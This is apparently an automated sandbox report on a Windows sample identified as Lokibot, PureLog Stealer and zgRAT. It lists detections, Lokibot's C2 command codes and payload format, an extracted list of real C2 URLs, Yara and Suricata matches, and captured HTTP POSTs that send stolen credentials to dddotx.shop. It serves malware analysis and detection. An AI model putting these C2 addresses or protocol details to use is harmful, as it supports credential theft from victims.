
Windows Analysis Report
6SQADa3zKv.exe

Overview

General Information

Sample name: 6SQADa3zKv.exe (renamed because the original name is a hash value)
Original sample name: 7cfbe6d3f41c153c78f4e24211ffd891cde46411f072d83798e0e03e140a7021.exe
Analysis ID: 1569270
MD5: d1d899b06642500d72acaeb42896b348
SHA1: 69683cca8c559a7cc2b6484ea982b2ca44be7a2f
SHA256: 7cfbe6d3f41c153c78f4e24211ffd891cde46411f072d83798e0e03e140a7021
Tags: exe, user-adrian__luca

Detection

Lokibot, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 6SQADa3zKv.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\6SQADa3zKv.exe" MD5: D1D899B06642500D72ACAEB42896B348)
    • aspnet_compiler.exe (PID: 1292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • aspnet_compiler.exe (PID: 5748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
Name: Loki Password Stealer (PWS), LokiBot

Description: "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24 characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th through 13th characters of the Mutex. For example: %APPDATA%\C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 through 18 of the Mutex. For example: 6B250D. Their purpose:
  • .exe: A copy of the malware that will execute every time the user account is logged into.
  • .lck: A lock file created when either decrypting Windows Credentials or keylogging, to prevent resource conflicts.
  • .hdb: A database of hashes for data that has already been exfiltrated to the C2 server.
  • .kdb: A database of keylogger data that has yet to be sent to the C2 server.

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data. The second packet transmitted by Loki-Bot contains decrypted Windows credentials. The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version. The second WORD of the HTTP Payload is the Payload Type. Identified payload types:
  • 0x26: Stolen Cryptocurrency Wallet
  • 0x27: Stolen Application Data
  • 0x28: Get C2 Commands from C2 Server
  • 0x29: Stolen File
  • 0x2A: POS (Point of Sale?)
  • 0x2B: Keylogger Data
  • 0x2C: Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:
  • 0x00: Download EXE & Execute
  • 0x01: Download DLL & Load #1
  • 0x02: Download DLL & Load #2
  • 0x08: Delete HDB File
  • 0x09: Start Keylogger
  • 0x0A: Mine & Steal Data
  • 0x0E: Exit Loki-Bot
  • 0x0F: Upgrade Loki-Bot
  • 0x10: Change C2 Polling Frequency
  • 0x11: Delete Executables & Exit

Suricata Signatures (rule SID: rule name):
  • 2024311: ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
  • 2024312: ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
  • 2024313: ET TROJAN Loki Bot Request for C2 Commands Detected M1
  • 2024314: ET TROJAN Loki Bot File Exfiltration Detected
  • 2024315: ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
  • 2024316: ET TROJAN Loki Bot Screenshot Exfiltration Detected
  • 2024317: ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
  • 2024318: ET TROJAN Loki Bot Request for C2 Commands Detected M2
  • 2024319: ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
Name: zgRAT

Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.

Attribution: No Attribution

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Extracted malware configuration (Lokibot):
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}
Yara matches on the submitted sample (Source | Rule | Description | Author):
6SQADa3zKv.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
6SQADa3zKv.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
6SQADa3zKv.exe | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen
  Strings:
  • 0xe7dd:$s1: file:///
  • 0xe739:$s2: {11111-22222-10009-11112}
  • 0xe76d:$s3: {11111-22222-50001-00000}
  • 0xd6e4:$s4: get_Module
  • 0xe36a:$s5: Reverse
  • 0xe359:$s6: BlockCopy
  • 0xe3a2:$s7: ReadByte
  • 0xe7f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...

Yara matches on the PCAP (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security

Yara matches on memory dumps (Source | Rule | Description | Author):
00000000.00000000.2119213083.0000000000412000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Lokibot_1f885282 | unknown | unknown
  Strings:
  • 0x17ef8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
(22 entries in total; the remaining entries are collapsed in the report)

Yara matches on unpacked PEs (Source | Rule | Description | Author):
0.0.6SQADa3zKv.exe.410000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.0.6SQADa3zKv.exe.410000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.0.6SQADa3zKv.exe.410000.0.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen
  Strings:
  • 0xe7dd:$s1: file:///
  • 0xe739:$s2: {11111-22222-10009-11112}
  • 0xe76d:$s3: {11111-22222-50001-00000}
  • 0xd6e4:$s4: get_Module
  • 0xe36a:$s5: Reverse
  • 0xe359:$s6: BlockCopy
  • 0xe3a2:$s7: ReadByte
  • 0xe7f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.6SQADa3zKv.exe.384ab08.3.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0.2.6SQADa3zKv.exe.384ab08.3.unpack | Windows_Trojan_Lokibot_1f885282 | unknown | unknown
  Strings:
  • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
(27 entries in total; the remaining entries are collapsed in the report)

System Summary

Sigma match:
Source: Process started; Author: frack113; Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\6SQADa3zKv.exe", ParentImage: C:\Users\user\Desktop\6SQADa3zKv.exe, ParentProcessId: 5948, ParentProcessName: 6SQADa3zKv.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 1292, ProcessName: aspnet_compiler.exe

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T17:08:49.559564+0100 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.6 | 49707 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:50.948383+0100 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.6 | 49708 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:48.612484+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49707 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:49.951076+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49708 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:51.642512+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:52.636477+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:52.636477+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:48.612484+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.6 | 49707 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:49.951076+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.6 | 49708 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:51.642512+0100 | 2021641 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:48.612484+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49707 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:49.951076+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49708 | 172.67.153.63 | 80 | TCP
2024-12-05T17:08:51.642512+0100 | 2825766 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 172.67.153.63 | 80 | TCP


AV Detection

Source: 6SQADa3zKv.exe; Avira: detected
Source: https://dddotx.shop/Mine/PWS/fre.php; Avira URL Cloud: Label: malware
Source: http://kbfvzoboss.bid/alien/fre.php; Avira URL Cloud: Label: phishing
Source: http://alphastand.top/alien/fre.php; Avira URL Cloud: Label: malware
Source: https://dddotx.shop/Mine/PWS/fre.phpH; Avira URL Cloud: Label: malware
Source: http://alphastand.win/alien/fre.php; Avira URL Cloud: Label: malware
Source: http://dddotx.shop/Mine/PWS/fre.php; Avira URL Cloud: Label: malware
Source: http://alphastand.trade/alien/fre.php; Avira URL Cloud: Label: malware
Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}
Source: 6SQADa3zKv.exe; ReversingLabs: Detection: 60%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 6SQADa3zKv.exe; Joe Sandbox ML: detected
Source: 6SQADa3zKv.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 6SQADa3zKv.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: BATMAN.pdbxD; source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: aspnet_compiler.pdb; source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2182297243.0000000000942000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: BATMAN.pdb; source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Oct21.pdb; source: 6SQADa3zKv.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 2_2_00403D74

Networking

Source: Network traffic; Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49708 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49708 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49708 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49710 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49710 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49710 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49707 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49707 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49707 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49707 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49708 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49710 -> 172.67.153.63:80
Source: Network traffic; Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.6:49710 -> 172.67.153.63:80
Source: Malware configuration extractor; URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor; URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor; URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor; URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor; URLs: https://dddotx.shop/Mine/PWS/fre.php
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic; HTTP traffic detected:
  POST /Mine/PWS/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: dddotx.shop
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 925F43C2
  Content-Length: 188
  Connection: close
Source: global traffic; HTTP traffic detected:
  POST /Mine/PWS/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: dddotx.shop
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 925F43C2
  Content-Length: 188
  Connection: close
Source: global traffic; HTTP traffic detected:
  POST /Mine/PWS/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: dddotx.shop
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 925F43C2
  Content-Length: 161
  Connection: close
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe; Code function: 2_2_00404ED4 recv, 2_2_00404ED4
Source: global traffic; DNS traffic detected: DNS query: dddotx.shop
Source: unknown; HTTP traffic detected:
  POST /Mine/PWS/fre.php HTTP/1.0
  User-Agent: Mozilla/4.08 (Charon; Inferno)
  Host: dddotx.shop
  Accept: */*
  Content-Type: application/octet-stream
  Content-Encoding: binary
  Content-Key: 925F43C2
  Content-Length: 188
  Connection: close
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Thu, 05 Dec 2024 16:08:49 GMT
  Content-Type: text/html; charset=UTF-8
  Connection: close
  X-Frame-Options: SAMEORIGIN
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DC1Le%2BDiy2G%2FblVMQtNZTQZxkNLrvBkMzyrk8Lv0Hsn3oMUxWrZ4Fcu%2BnDXcVeRiDamqR%2F4%2FmiIDaL4ITK2m3nzrzAmdcLxkAJgDMm4sqsdbTQZLSnmy5ZYx6tKXtw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ed54c0cac7c42de-EWR
  Body (decoded from the captured bytes, truncated in the capture):
  <!DOCTYPE html>
  <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
  <head>
  <title>Suspected phishing site | Cloudflare</title>
  <meta charset="UTF-8" />
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
  <meta name="robots" content="noindex, nofollow" />
  <meta name="viewport" content="width=device-width,initial-scale=1" />
  <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Thu, 05 Dec 2024 16:08:50 GMT
  Content-Type: text/html; charset=UTF-8
  Connection: close
  X-Frame-Options: SAMEORIGIN
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E8KByjwPVRDzckWfwhsqzcyp8CStwlgUPhMUsP1S3SlyviMFU9tQIcsNRTL%2FS4L9%2B0ejmFMtsEWeuY%2BX3iLhq4qrQOQt3A0bgWRp8JG%2FK3lSw2oLkl5O%2B4VJ%2F6saMw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ed54c15486c19bf-EWR
  Body (decoded from the captured bytes, truncated in the capture):
  <!DOCTYPE html>
  <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
  <head>
  <title>Suspected phishing site | Cloudflare</title>
  <meta charset="UTF-8" />
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
  <meta name="robots" content="noindex, nofollow" />
  <meta name="viewport" content="width=device-width,initial-scale=1" />
  <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/sty
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Thu, 05 Dec 2024 16:08:52 GMT
  Content-Type: text/html; charset=UTF-8
  Connection: close
  X-Frame-Options: SAMEORIGIN
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXDuLr5yd7B6aJd%2BuLl5EwxNocMfvrsLYims54n29GsBiRzWxc57q5vMQwBjVHFP8jUmxGjuN3aExQLh%2BDMyjKIEyWoaaLe4nXcgSPWgJTFtHZOyufmUwCYBKXkrzA%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8ed54c1fd95541e6-EWR
  Body (decoded from the captured bytes, truncated in the capture):
  <!DOCTYPE html>
  <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
  <head>
  <title>Suspected phishing site | Cloudflare</title>
  <meta charset="UTF-8" />
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
  <meta name="robots" content="noindex, nofollow" />
  <meta name="viewport" content="width=device-width,initial-scale=1" />
  <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.e
Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://www.ibsensoftware.com/
Source: aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.2182210886.00000000004A0000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://dddotx.shop/Mine/PWS/fre.php
Source: aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dddotx.shop/Mine/PWS/fre.phpH
Source: aspnet_compiler.exe, 00000002.00000002.2182679778.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

                      System Summary

                      barindex
                      Source: 6SQADa3zKv.exe, type: SAMPLE | Matched rule: Detects zgRAT Author: ditekSHen
                      Source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload Author: kevoreilly
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki Payload Author: kevoreilly
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
